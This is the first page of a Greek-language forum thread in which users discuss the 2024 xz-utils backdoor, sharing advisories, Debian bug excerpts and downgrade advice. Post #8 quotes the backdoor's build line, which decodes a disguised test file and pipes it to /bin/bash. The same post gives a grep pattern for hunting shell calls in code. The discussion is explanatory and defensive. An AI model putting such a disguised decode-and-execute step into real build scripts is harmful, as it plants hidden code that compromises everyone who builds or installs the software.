Σελ. 1 από 7 1236 ... ΤελευταίαΤελευταία
Εμφάνιση 1-15 από 98
  1. #1
    Εγγραφή
    11-12-2003
    Περιοχή
    Θεσσαλονίκη
    Ηλικία
    46
    Μηνύματα
    6.616
    Downloads
    6
    Uploads
    0
    Τύπος
    VDSL2
    Ταχύτητα
    102400/10240
    ISP
    Vodafone
    DSLAM
    ΟΤΕ - ΤΟΥΜΠΑ
    Router
    Fritz!box 7530
    Exclamation
    Προσοχή με το xz-utils, όσοι είστε στην έκδοση 5.6.0+, κάντε αμέσως downgrade. Από αυτά που διάβασα, σε αυτές τις εκδόσεις περιλαμβάνεται κάποιο commit που επιτρέπει την αποφυγή του sshd authentication, αν η βιβλιοθήκη liblzma φορτωθεί από το ssh daemon.

    https://xeiaso.net/notes/2024/xz-vuln/

    https://gist.github.com/thesamesam/2...ent_id=5005868
    ... Morpheus: What is "real"? How do you define "real"? If you 're talking about what you can feel, what you can smell, what you can taste and see, then "real" is simply electrical signals interpreted by your brain...
    __________
    Η σελίδα μου - e-tameio

  2. #2
    Εγγραφή
    29-05-2005
    Μηνύματα
    1.291
    Downloads
    11
    Uploads
    0
    Ταχύτητα
    16384/1024
    ISP
    Forthnet
    Router
    d-link g624t
    SNR / Attn
    6(dB) / 22(dB)
    "Through a series of complex obfuscations, the liblzma build process extracts a prebuilt object file from a disguised test file existing in the source code, which is then used to modify specific functions in the liblzma code," the IBM subsidiary said in an advisory."
    "Very annoying - the apparent author of the backdoor was in communication with me over several weeks trying to get xz 5.6.x added to Fedora 40 & 41 because of it's "great new features". We even worked with him to fix the valgrind issue (which it turns out now was caused by the backdoor he had added). We had to race last night to fix the problem after an inadvertent break of the embargo.

    He has been part of the xz project for 2 years, adding all sorts of binary test files, and to be honest with this level of sophistication I would be suspicious of even older versions of xz until proven otherwise. "
    Ο τύπος έκανε μέγιστη ζημιά.
    Time marches
    On and on and on, flies eternally

  3. #3
    Εγγραφή
    11-12-2003
    Περιοχή
    Θεσσαλονίκη
    Ηλικία
    46
    Μηνύματα
    6.616
    Downloads
    6
    Uploads
    0
    Τύπος
    VDSL2
    Ταχύτητα
    102400/10240
    ISP
    Vodafone
    DSLAM
    ΟΤΕ - ΤΟΥΜΠΑ
    Router
    Fritz!box 7530
    Άντε μετά να ξαναεμπιστευτείς (και εμείς και οι διανομές) το xz...
    ... Morpheus: What is "real"? How do you define "real"? If you 're talking about what you can feel, what you can smell, what you can taste and see, then "real" is simply electrical signals interpreted by your brain...
    __________
    Η σελίδα μου - e-tameio

  4. #4
    Εγγραφή
    28-03-2024
    Μηνύματα
    29
    Downloads
    0
    Uploads
    0
    ISP
    πΟΤΕss
    Παράθεση Αρχικό μήνυμα από GoofyX Εμφάνιση μηνυμάτων
    Άντε μετά να ξαναεμπιστευτείς (και εμείς και οι διανομές) το xz...
    παει αυτό ... its official dead


    Παράθεση Αρχικό μήνυμα από Ronin Εμφάνιση μηνυμάτων
    Ο τύπος έκανε μέγιστη ζημιά.
    εχω την εντυπωση οτι αυτο ειναι προεορτια ενος νεου μεγαλου πολεμου αλλά παλι ισως οχι και μακαρι να κανω λαθος

  5. #5
    Εγγραφή
    11-12-2003
    Περιοχή
    Θεσσαλονίκη
    Ηλικία
    46
    Μηνύματα
    6.616
    Downloads
    6
    Uploads
    0
    Τύπος
    VDSL2
    Ταχύτητα
    102400/10240
    ISP
    Vodafone
    DSLAM
    ΟΤΕ - ΤΟΥΜΠΑ
    Router
    Fritz!box 7530
    Maintainers από άλλα repositories που έκανε commit ο τύπος ψάχνονται να δουν τι commit είχε κάνει τότε και αν μπορεί να είναι malicious.

    Πχ. libarchive: https://bugs.gentoo.org/928146

    Επίσης: https://boehs.org/node/everything-i-...he-xz-backdoor

    - - - Updated - - -

    Εμφανίστηκε ο Lasse Collin, ο πρώτος developer: https://tukaani.org/xz-backdoor/
    ... Morpheus: What is "real"? How do you define "real"? If you 're talking about what you can feel, what you can smell, what you can taste and see, then "real" is simply electrical signals interpreted by your brain...
    __________
    Η σελίδα μου - e-tameio

  6. #6
    Εγγραφή
    28-03-2024
    Μηνύματα
    29
    Downloads
    0
    Uploads
    0
    ISP
    πΟΤΕss
    Παράθεση Αρχικό μήνυμα από GoofyX Εμφάνιση μηνυμάτων
    Maintainers από άλλα repositories που έκανε commit ο τύπος ψάχνονται να δουν τι commit είχε κάνει τότε και αν μπορεί να είναι malicious.

    Εμφανίστηκε ο Lasse Collin, ο πρώτος developer: https://tukaani.org/xz-backdoor/
    και κάπως ετσι ενας contributor συμπαρεσυρε τον κυριο dev στην κολαση μιας και απο μονος του πλεον χωρις να του πει κανενας και θα ψαξει γραμμη προς γραμμη τι προσθεσε ο Jia Tan αλλα και ηδη αρχισε να απολογειται για το τι εκανε αυτος και τι ο αλλος

    ασε που κανεις δεν θα τον εμπιστευεται απο εδω και περα και θα το κοιταζουν ολοι με μισο ματι...

    υ.γ, αυτο ανοιξε τους μεγαλους ασκους του Αιολου...

    αφηνω εδω τις 1ες παραγραφους απο mails του debian
    https://bugs.debian.org/cgi-bin/bugr...gi?bug=1068024

    1)

    "Package: xz-utils
    Version: 5.6.1+really5.4.5-1
    Severity: important
    Tags: security

    I count a minimum of 750 commits or contributions to xz by Jia Tan, who
    backdoored it.

    This includes all 700 commits made after they merged a pull request in Jan 7
    2023, at which point they appear to have already had direct push access, which
    would have also let them push commits with forged authors. Probably a number of
    other commits before that point as well.

    Reverting the backdoored version to a previous version is not sufficient to
    know that Jia Tan has not hidden other backdoors in it. Version 5.4.5 still
    contains the majority of those commits."



    2)

    "On 2024-03-29 16:25, Joey Hess wrote:
    > I'd suggest reverting to 5.3.1. Bearing in mind that there were security
    > fixes after that point for ZDI-CAN-16587 that would need to be reapplied.

    Note that reverted to such an old version will break packages that use
    new symbols introduced since then. From a quick look, this is at least:
    - dpkg
    - erofs-utils
    - kmod
    "

    και εβαλα μονο αυτα που ειναι τεχνικής αποψεως χωρις να προσθεσω το αχρειαστο δραμα που ηδη ξεκινησε....
    Τελευταία επεξεργασία από το μέλος SWBiiLive : 30-03-24 στις 16:20.

  7. #7
    Εγγραφή
    11-12-2003
    Περιοχή
    Θεσσαλονίκη
    Ηλικία
    46
    Μηνύματα
    6.616
    Downloads
    6
    Uploads
    0
    Τύπος
    VDSL2
    Ταχύτητα
    102400/10240
    ISP
    Vodafone
    DSLAM
    ΟΤΕ - ΤΟΥΜΠΑ
    Router
    Fritz!box 7530
    Μάλλον το πιο ασφαλές σε αυτή τη φάση για το xz-utils για μια διανομή είναι να βάλει την τελευταία έκδοση που έκανε ο Lasse, την 5.4.2. Αυτό έκανε το Gentoo.
    ... Morpheus: What is "real"? How do you define "real"? If you 're talking about what you can feel, what you can smell, what you can taste and see, then "real" is simply electrical signals interpreted by your brain...
    __________
    Η σελίδα μου - e-tameio

  8. #8
    Εγγραφή
    28-03-2024
    Μηνύματα
    29
    Downloads
    0
    Uploads
    0
    ISP
    πΟΤΕss
    αν αναρωτιέται κανείς ποια ηταν η μορφή της backdoor στην xz library, αυτή η γραμμή ειναι

    Κώδικας:
    " sed rpath ../../../tests/files/bad-3-corrupt_lzma2.xz | tr "	 \-_" " 	_\-" | xz -d | /bin/bash >/dev/null 2>&1;"
    που οπως εξηγει αυτός που το βρηκε αφήνει ως αποτελεσμα...

    Κώδικας:
     "| bash"
    απο https://www.openwall.com/lists/oss-s...y/2024/03/29/4

    τόσο απλά γιατι παιρνει pipe την bash!

    και καπου εδω ξεκιναει το μεγαλο ψαξιμο στους κωδικες ..

    π.χ.
    Κώδικας:
    grep -E -r -color "bash|sh|csh|tcsh|zsh|scsh|ksh"  --include=*.{h,cpp} .
    Τελευταία επεξεργασία από το μέλος SWBiiLive : 30-03-24 στις 18:09.

  9. #9
    Εγγραφή
    27-11-2008
    Μηνύματα
    145
    Downloads
    0
    Uploads
    0
    Καλησπερα σαν αρχαριος χρηστης που ειμαι διαφωτιστε με.Μεχρι χτες το πρωι ειχα fedora 40 beta.Σημερα εμαθα για το xz το οποιο αν καταλαβα καλα ειναι για αποσυμπιεση αρχειων.Αυτο αν καποιος εγκαταστησει νεο iso fedora h tubletweed συμπεριλαμβανεται και ειναι στη εκδοση 5.4 οπου θεωρητικως ειναι ασφαλης σωστα καταλαβα;; Γιατι δε το αφαιρουν τελειως απο το iso??? Ενας απλος χρηστης τι πρεπει να κανει αν εγκαταστησει τωρα tublet h fedora.

  10. #10
    Εγγραφή
    28-03-2024
    Μηνύματα
    29
    Downloads
    0
    Uploads
    0
    ISP
    πΟΤΕss
    Παράθεση Αρχικό μήνυμα από johnmayson2 Εμφάνιση μηνυμάτων
    Καλησπερα σαν αρχαριος χρηστης που ειμαι διαφωτιστε με.Μεχρι χτες το πρωι ειχα fedora 40 beta.Σημερα εμαθα για το xz το οποιο αν καταλαβα καλα ειναι για αποσυμπιεση αρχειων.Αυτο αν καποιος εγκαταστησει νεο iso fedora h tubletweed συμπεριλαμβανεται και ειναι στη εκδοση 5.4 οπου θεωρητικως ειναι ασφαλης σωστα καταλαβα;; Γιατι δε το αφαιρουν τελειως απο το iso??? Ενας απλος χρηστης τι πρεπει να κανει αν εγκαταστησει τωρα tublet h fedora.

    η fedora ειναι η beta εκδοση της Red Hat και εβαλες την Fedora beta?

    Τώρα αυτό ειναι beta² ή betax2?

    /joke mode off

    προσωπικα δεν θα το θεωρουσα ασφαλης γιατι ο τυπος εχει δραστηριοτητα 2 χρόνια και μπορει να εχει φυτεψει και αλλα backdoors!

    αυτο βρεθηκε μεχρι στιγμης...

    συμβουλή μου? οτι πουν οι dev της fedora. ακομα μιλανε . το τελευταιο msg ειναι πριν 24 min ...

    https://discussion.fedoraproject.org...pond/110683/19


    μην βαλεις τιποτα κωδικους email e-banking κλπ μεχρι να σιγουρευτεις και αν εχεις ηδη βαλει δεν ηρθε η συντελεια απλα κατεγραψε ΣΕ ΕΝΑ ΧΑΡΤΙ ΠΟΥ ΕΙΝΑΙ ΑΧΑΚΑΡΙΣΤΟ που εχεις ηδη βαλει...
    Τελευταία επεξεργασία από το μέλος SWBiiLive : 30-03-24 στις 19:10.

  11. #11
    Εγγραφή
    08-03-2007
    Μηνύματα
    23.491
    Downloads
    25
    Uploads
    0
    ISP
    ΟΤΕ Conn-x
    Μια troll μετατροπη ενος γνωστου xkcd κομικ που πετυχα στο reddit
    https://www.reddit.com/media?url=htt...165n4grc1.jpeg
    ديميتريس

  12. #12
    Εγγραφή
    12-03-2019
    Περιοχή
    Thess
    Ηλικία
    30
    Μηνύματα
    353
    Downloads
    1
    Uploads
    0
    Τύπος
    Other / Άλλο
    Ταχύτητα
    20/20
    ISP
    Wbs ± 20 Mbps
    Router
    BT Home Hub 5A (OpenWRT)
    Το κακό είναι οτι το github έκοψε την πρόσβαση. Τα θεώρησε όλα ραδιενεργά.

    Το κακό είναι οτι ο συγκεκριμένος "κινέζος" dev είχε συμμετάσχει και σε αλλα projects, καπου αναφέρουν και το openssl.

    - - - Updated - - -

    Παράθεση Αρχικό μήνυμα από johnmayson2 Εμφάνιση μηνυμάτων
    Καλησπερα σαν αρχαριος χρηστης που ειμαι διαφωτιστε με
    Ψάξε ενημερώσεις θα βγούνε και που θα χρησιμοποιούν έκδοση xz που δεν έχει τη συγκεκριμένη αδυναμία.

    Αν και ο συγκεκριμένος που την έβαλε (όπως φαίνεται δολίως) ήταν βασικός συμμετέχων στο project.

  13. #13
    Εγγραφή
    11-12-2003
    Περιοχή
    Θεσσαλονίκη
    Ηλικία
    46
    Μηνύματα
    6.616
    Downloads
    6
    Uploads
    0
    Τύπος
    VDSL2
    Ταχύτητα
    102400/10240
    ISP
    Vodafone
    DSLAM
    ΟΤΕ - ΤΟΥΜΠΑ
    Router
    Fritz!box 7530
    Παράθεση Αρχικό μήνυμα από MyISLM Εμφάνιση μηνυμάτων
    Το κακό είναι οτι το github έκοψε την πρόσβαση. Τα θεώρησε όλα ραδιενεργά.

    Το κακό είναι οτι ο συγκεκριμένος "κινέζος" dev είχε συμμετάσχει και σε αλλα projects, καπου αναφέρουν και το openssl.
    Και στη βιβλιοθήκη libarchive είχε κάνει. Κι εκεί ψάχνονται γενικώς να δουν τι θα κάνουν.
    ... Morpheus: What is "real"? How do you define "real"? If you 're talking about what you can feel, what you can smell, what you can taste and see, then "real" is simply electrical signals interpreted by your brain...
    __________
    Η σελίδα μου - e-tameio

  14. #14
    Εγγραφή
    27-11-2008
    Μηνύματα
    145
    Downloads
    0
    Uploads
    0
    Δε θα βαλω τιποτα.Δε ειναι μονο fedora ειναι και tubletweed και debian.Δε μπορω να καταλαβω γιατι δε αφαιρουν τελειως αυτο το xz απο τα iso ολων των εκδοσεων.Αφου και η προηγουμενη εκδοση δε ειμαστε σιγουροι οτι ειναι οκ.

  15. #15
    Εγγραφή
    12-03-2019
    Περιοχή
    Thess
    Ηλικία
    30
    Μηνύματα
    353
    Downloads
    1
    Uploads
    0
    Τύπος
    Other / Άλλο
    Ταχύτητα
    20/20
    ISP
    Wbs ± 20 Mbps
    Router
    BT Home Hub 5A (OpenWRT)
    Παράθεση Αρχικό μήνυμα από johnmayson2 Εμφάνιση μηνυμάτων
    Δε μπορω να καταλαβω γιατι δε αφαιρουν τελειως αυτο το xz
    Σταδιακα θα αρχισει να αντικαθίσταται παντού με κώδικα που δεν έχει αδυναμία. Η βιβλιοθήκη χρησιμοποιείται σε πολλά σημεία. Να φοβάσαι ενσωματωμένες συσκευές IOT/ρουτεράκια που δεν βγαίνουν ενημερώσεις, όχι σταθερούς και λαπτοπς.

    Σε κλειστού κώδικα πράγματα, τέτοια συζήτηση δεν θα γινόταν ποτέ. Στα Windows (που οι προγραμματιστές είναι επι πληρωμή) αν ανακαλυφθεί απο κάποιον τρίτο αδυναμία (πράγμα πολύ συχνό - δεν συζητάται τόσο γιατί είναι κλειστός ο κώδικας- ), απλά βγάζει ενημέρωση η Microsoft και την παίρνεις απο το Windows Update.

    Πάω ενα στοίχημα οτι η Ubiquiti κεραία που μπαίνω στο internet και o WISP που έχω και δεν μου δίνει πρόσβαση, είναι αδύναμη σε αυτό.

    Πιθανά commits στο openssl είναι αρκετά πιο επικίνδυνα.
    Τελευταία επεξεργασία από το μέλος MyISLM : 30-03-24 στις 21:38.

Σελ. 1 από 7 1236 ... ΤελευταίαΤελευταία

Tags για αυτό το Θέμα

Bookmarks

Bookmarks

Δικαιώματα - Επιλογές

  • Δεν μπορείτε να δημοσιεύσετε νέα θέματα
  • Δεν μπορείτε να δημοσιεύσετε νέα μηνύματα
  • Δεν μπορείτε να αναρτήσετε συνημμένα
  • Δεν μπορείτε να επεξεργαστείτε τα μηνύματα σας
  •  
  • Τα BB code είναι σε λειτουργία
  • Τα Smilies είναι σε λειτουργία
  • Το [IMG] είναι σε λειτουργία
  • Το [VIDEO] είναι σε λειτουργία
  • Το HTML είναι εκτός λειτουργίας